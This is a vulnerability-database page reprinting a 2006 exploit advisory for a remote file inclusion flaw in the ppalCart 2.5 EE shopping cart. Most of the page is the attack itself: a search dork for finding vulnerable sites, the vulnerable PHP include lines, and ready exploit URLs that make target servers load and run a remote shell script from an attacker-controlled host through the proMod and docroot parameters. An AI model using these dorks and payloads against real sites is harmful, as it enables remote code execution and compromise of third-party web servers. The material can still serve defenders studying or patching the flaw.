Lucene search

K

PayProCart.txt

🗓️ 07 Sep 2006 00:00:00Reported by momo26Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

PayProCart.txt contains a remote file inclusion exploit in ppalCart V(2.5 EE) that allows remote file execution. It is discovered by momo26 and affects software version 2.5 EE by vendor http://www.profitcode.com.

Show more
Code
`google dork :"powered by: profitCode"  
  
exploite:  
http://[url]/index.php?proMod=http://shell.txt?  
  
discoverde by momo26 ;)!!!!!!!!!!!!!!!  
  
+--------------------------------------------------------------------  
+  
+ ppalCart V(2.5 EE) Remote File Inclusion  
+  
+-------------------------------------------------------------------  
+  
+ Affected Software .: Software  
+ Version .............: ppalCart 2.5 EE  
+ Venedor ...........: http://www.profitcode.com  
+ Class .............: Remote File Inclusion  
+ Risk ..............: high (Remote File Execution)  
+ Found by ..........: momo26  
+ Writtin by ..........: Eddy_BAck0o - www.LEzr.com/vB  
+ Contact ...........: http://www.lezr.com/vb/showthread.php?t=12673  
+  
+--------------------------------------------------------------------  
+--------------------------------------------------------------------  
+ ./index Directory ...  
+ [index.php]  
+  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+include $docroot . "js/css/shop-custom.php";  
+include $docroot . "js/css/shop-default.php";  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+  
+Line --> 50 - 349  
+  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+else if($proMod) {  
+include "$proMod" . ".php";  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+  
+Line --> 288 - 349  
+Ex --> http://www.victom.com/index.php?proMod=http://yourevil.com/r0x.txt?cmd  
+  
+-------------------------------------------------------------------  
+-------------------------------------------------------------------  
+ [mainpage.php]  
+  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+include "$docroot" . "shopincs/commonincs/shop-mainbottom" . "$langFile" .  
".php";  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+  
+Line --> 158 - 308  
+  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+include "$docroot" . "tplates/newitems.php";  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+  
+Line --> 284 - 308  
+  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+include "$docroot" . "tplates/specials.php";  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+  
+Line --> 287 - 308  
+  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+include "$docroot" . "cstmincs/cstmbanner$langFile.php";  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+  
+Line --> 290 - 308  
+  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+include "$docroot" . "tplates/upselladvert.php";  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+  
+Line --> 292 - 308  
+  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+include "$docroot" . "mainincs/upsellproducts.php";  
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
+  
+Line --> 298 - 308  
+Ex --> http://www.victom.com/mainpage.php?docroot=http://yourevil.com/r0x.txt?cmd  
+  
+--------------------------------------------------------------------  
+Eddy_BAck0o ;  
+--------------------------------------------------------------------  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
07 Sep 2006 00:00Current
7.4High risk
Vulners AI Score7.4
18
.json
Report